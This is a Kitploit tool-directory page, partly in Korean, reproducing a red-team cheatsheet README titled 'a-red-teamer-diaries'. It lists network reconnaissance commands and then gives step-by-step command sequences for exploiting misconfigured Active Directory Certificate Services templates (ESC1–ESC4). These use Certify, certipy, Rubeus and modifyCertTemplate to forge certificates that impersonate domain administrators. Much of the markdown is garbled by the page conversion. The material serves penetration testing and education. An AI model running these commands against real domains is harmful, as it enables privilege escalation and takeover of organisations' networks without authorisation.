Skip to content
KitploitKITPLOIT
도구익스플로잇블로그
Log in
제출
도구익스플로잇블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

피드문의개인정보© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
A-Red-Teamer-diaries — RedTeam/Pentest 노트 및 실험 — 전문 업무와 관련된 여러 인프라에서 테스트된 내용. | Kitploit
도구/GitHubGitHub/ihebski/a-red-teamer-diaries
Privilege EscalationVulnerability AnalysisExploitationLateral MovementInformation GatheringPost-ExploitationPenetration TestingLearning & EducationRed TeamingCurated Resources
GitHub
1.9k3153011개월 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
ihebski/a-red-teamer-diaries

A-Red-Teamer-diaries

RedTeam/Pentest 노트 및 실험 — 전문 업무와 관련된 여러 인프라에서 테스트된 내용.

저장소 보기

레드팀 일기

여러 통제된 환경/인프라에서 수행된 나의 침투 테스트/레드팀 실험에 대한 공개 노트로, 보안 평가 중 침투 테스터와 레드팀이 사용하는 다양한 도구와 기술을 다룹니다.

  • 프로젝트 진행 중

기여하기

GitHub 풀 리퀘스트를 통한 기여를 환영합니다.
어려운 작업을 해낸 분들에게 감사와 찬사를 보냅니다.

목표

  • 침투 테스터가 업무 중에 시간을 절약하고 특정 명령어를 빠르게 찾을 수 있도록 코드 조각과 명령어를 모아 놓은 침투 테스트/레드팀 치트시트
  • 공격이 어떻게 수행될 수 있는지 이해
  • 향후 참고를 위한 메모 작성

면책 조항

교육 목적으로만 사용하시기 바랍니다. 사용에 대한 책임은 본인에게 있습니다.

침투 킬 체인

KillChain

네트워크 매핑

RunFinger.py

네트워크에서 실행 중인 도메인 이름과 Windows 머신에 대한 정보를 수집합니다.```bash bash$ cd /usr/share/Responder/tools bash$ sudo python RunFinger.py -i 192.168.1.1/24

또는```bash
bash$ responder-RunFinger

Nbtscan

IP 네트워크에서 NetBIOS 이름 정보를 스캔합니다.```bash bash$ sudo nbtscan -v -s : 192.168.1.0/24

## Crackmapexec v 4.0

SMB 정보를 기반으로 네트워크 범위를 스캔합니다.```bash
bash$ cme smb 192.168.1.1/24

Nmap 스캔

모든 머신 네트워크를 스캔하고 출력을 저장합니다 .

  • -oA 옵션 : 모든 형식으로 출력을 의미함
  • -T4 : 빠른 스캔

빠른 스캔```bash bash$ nmap -p 1-65535 -sV -sS -T4 -oA output target_IP

집중 스캔 (참고: 권장됨):```bash
bash$ nmap -p 1-65535 -Pn -A -oA output target_IP 

실행 중인 서비스 버전을 열거하여 스캔 :

  • -sC : 기본 스크립트, --script=default와 동일
  • -sV : 서비스 버전 확인```bash bash$ nmap -sC -sV -oA output target
## Angry IP scanner

Download the tool from this link : 
[Angry IP Scanner](http://angryip.org/download/#linux) 
* Change the preferences settings 
> Go to : Preferences -> Ports -> add 80,445,554,21 ,22 in the port selection <br>
> Go to : Preferences -> Display -> select Alive Hosts <br>
> Go to : Preferences -> Pinging -> select Combained (UDP/TCP)

# Lateral Movement and Exploitation

### Active Directory Certificate Services
This part was copied from https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md#esc1---misconfigured-certificate-templates 
<br>For more details check : https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation

(Tested on private environment (Bloodhound then ESC1 exploit) 
* Find ADCS Server
  * `crackmapexec ldap domain.lab -u username -p password -M adcs`
  * `ldapsearch -H ldap://dc_IP -x -LLL -D 'CN=<user>,OU=Users,DC=domain,DC=local' -w '<password>' -b "CN=Enrollment Services,CN=Public Key Services,CN=Services,CN=CONFIGURATION,DC=domain,DC=local" dNSHostName`
* Enumerate AD Enterprise CAs with certutil: `certutil.exe -config - -ping`, `certutil -dump`

#### ESC1 - Misconfigured Certificate Templates

> Domain Users can enroll in the **VulnTemplate** template, which can be used for client authentication and has **ENROLLEE_SUPPLIES_SUBJECT** set. This allows anyone to enroll in this template and specify an arbitrary Subject Alternative Name (i.e. as a DA). Allows additional identities to be bound to a certificate beyond the Subject.

Requirements:
*  Template that allows for AD authentication
* **ENROLLEE_SUPPLIES_SUBJECT** flag
* [PKINIT] Client Authentication, Smart Card Logon, Any Purpose, or No EKU (Extended/Enhanced Key Usage) 

Exploitation:
* Use [Certify.exe](https://github.com/GhostPack/Certify) to see if there are any vulnerable templates
    ```ps1
    Certify.exe find /vulnerable
    Certify.exe find /vulnerable /currentuser
    # or
    PS> Get-ADObject -LDAPFilter '(&(objectclass=pkicertificatetemplate)(!(mspki-enrollment-flag:1.2.840.113556.1.4.804:=2))(|(mspki-ra-signature=0)(!(mspki-ra-signature=*)))(|(pkiextendedkeyusage=1.3.6.1.4.1.311.20.2.2)(pkiextendedkeyusage=1.3.6.1.5.5.7.3.2) (pkiextendedkeyusage=1.3.6.1.5.2.3.4))(mspki-certificate-name-flag:1.2.840.113556.1.4.804:=1))' -SearchBase 'CN=Configuration,DC=lab,DC=local'
    # or
    certipy 'domain.local'/'user':'password'@'domaincontroller' find -bloodhound
    ```
* Use Certify, [Certi](https://github.com/eloypgz/certi) or [Certipy](https://github.com/ly4k/Certipy) to request a Certificate and add an alternative name (user to impersonate)
    ```ps1
    # request certificates for the machine account by executing Certify with the "/machine" argument from an elevated command prompt.
    Certify.exe request /ca:dc.domain.local\domain-DC-CA /template:VulnTemplate /altname:domadmin
    certi.py req 'contoso.local/[email protected]' contoso-DC01-CA -k -n --alt-name han --template UserSAN
    certipy req 'corp.local/john:[email protected]' -ca 'corp-CA' -template 'ESC1' -alt '[email protected]'
    ```
* Use OpenSSL and convert the certificate, do not enter a password
    ```ps1
    openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
    ```
* Move the cert.pfx to the target machine filesystem and request a TGT for the altname user using Rubeus
    ```ps1
    Rubeus.exe asktgt /user:domadmin /certificate:C:\Temp\cert.pfx
    ```

**WARNING**: These certificates will still be usable even if the user or computer resets their password!

**NOTE**: Look for **EDITF_ATTRIBUTESUBJECTALTNAME2**, **CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT**, **ManageCA** flags, and NTLM Relay to AD CS HTTP Endpoints.


#### ESC2 - Misconfigured Certificate Templates

Requirements:
*  Allows requesters to specify a Subject Alternative Name (SAN) in the CSR as well as allows Any Purpose EKU (2.5.29.37.0)

Exploitation:
* Find template  ```ps1
  PS > Get-ADObject -LDAPFilter '(&(objectclass=pkicertificatetemplate)(!(mspki-enrollment-flag:1.2.840.113556.1.4.804:=2))(|(mspki-ra-signature=0)(!(mspki-ra-signature=*)))(|(pkiextendedkeyusage=2.5.29.37.0)(!(pkiextendedkeyusage=*))))' -SearchBase 'CN=Configuration,DC=megacorp,DC=local'
  • /altname을 도메인 관리자로 지정하는 인증서를 요청합니다. (ESC1에서와 같이)

ESC3 - 잘못 구성된 등록 에이전트 템플릿

ESC3는 인증서 템플릿에 인증서 요청 에이전트 EKU(등록 에이전트)가 지정된 경우입니다. 이 EKU는 다른 사용자를 대신하여 인증서를 요청하는 데 사용될 수 있습니다.

  • 취약한 인증서 템플릿 ESC3를 기반으로 인증서를 요청합니다. ```ps1 $ certipy req 'corp.local/john:[email protected]' -ca 'corp-CA' -template 'ESC3' [*] Saved certificate and private key to 'john.pfx'
  • 다른 사용자를 대신하여 인증서를 요청하기 위해 인증서 요청 에이전트 인증서(-pfx)를 사용합니다. ```ps1 $ certipy req 'corp.local/john:[email protected]' -ca 'corp-CA' -template 'User' -on-behalf-of 'corp\administrator' -pfx 'john.pfx'

ESC4 - 접근 제어 취약점

mspki-certificate-name-flag 플래그를 도메인 인증을 허용하는 템플릿에 활성화하면, 공격자가 템플릿에 "잘못된 구성을 밀어넣어 ESC1 취약점으로 이어질 수 있습니다

  • WriteProperty 값이 00000000-0000-0000-0000-000000000000인 것을 modifyCertTemplate을 사용하여 검색합니다 ```ps1 python3 modifyCertTemplate.py domain.local/user -k -no-pass -template user -dc-ip 10.10.10.10 -get-acl
  • ENROLLEE_SUPPLIES_SUBJECT (ESS) 플래그를 추가하여 ESC1을 수행합니다. ```ps1 python3 modifyCertTemplate.py domain.local/user -k -no-pass -template user -dc-ip 10.10.10.10 -add enrollee_supplies_subject -property mspki-Certificate-Name-Flag
도구 다운로드